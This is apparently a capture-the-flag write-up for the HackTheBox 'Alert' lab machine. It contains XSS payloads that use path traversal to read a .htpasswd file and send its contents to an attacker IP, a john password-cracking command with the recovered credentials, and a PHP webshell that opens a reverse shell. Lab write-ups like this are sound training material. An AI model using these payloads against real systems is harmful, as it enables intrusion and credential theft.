HackTheBox - Alert Machine Writeup

This is my first time to play this machine, So i hope i can find the flag and gain the root privilege <3

Target

• 10.10.11.44

First, we need use nmap scan this machine, command

nmap -sS -T4 -sV 10.10.11.44 -O -A -v -p-

Subsequently, it can be observed that ports 80 and 22 have been opened, and not filtered, btw If you haven’t added the alert.htb domain, you need to add the following in hosts file

# vim /etc/hosts
alert.htb [Machine IP Address]

Accessing this web page, we will find that it is a file upload page

use dirsearch to scan the web directory

python3 dirsearch.py -u http://alert.htb

At the same time, use BurpSuite to fuzzing this web page, touch a new Markfile, and started a http.server

<script> 
fetch("http://alert.htb/messages.php?file=filepath") 
  .then(response => response.text()) 
  .then(data => { 
    fetch("http://10.10.16.20/?file_content=" + encodeURIComponent(data)); 
  }); 
</script>

and we can use path traversal to read. htapass files

<script> 
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd") 
  .then(response => response.text()) 
  .then(data => { 
    fetch("http://10.10.16.20/?file_content=" + encodeURIComponent(data)); 
  }); 
</script>

Afterwards, we will receive the .htpasswd content

<pre>albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
</pre>

use john to crack it!

john - wordlist=/usr/share/wordlists/rockyou.txt - format=md5crypt-long "albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ"

Now we have obtained the apr1 password

albert
manchesterunited

find first flag!

Check the subnet

create a new webshell file

<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.16.20/12345 0>&1'"); ?>

and forwarding the 8080 port

ssh -L 8080:127.0.0.1:8080 -vl albert alert.htb
manchesterunited

give the root flag!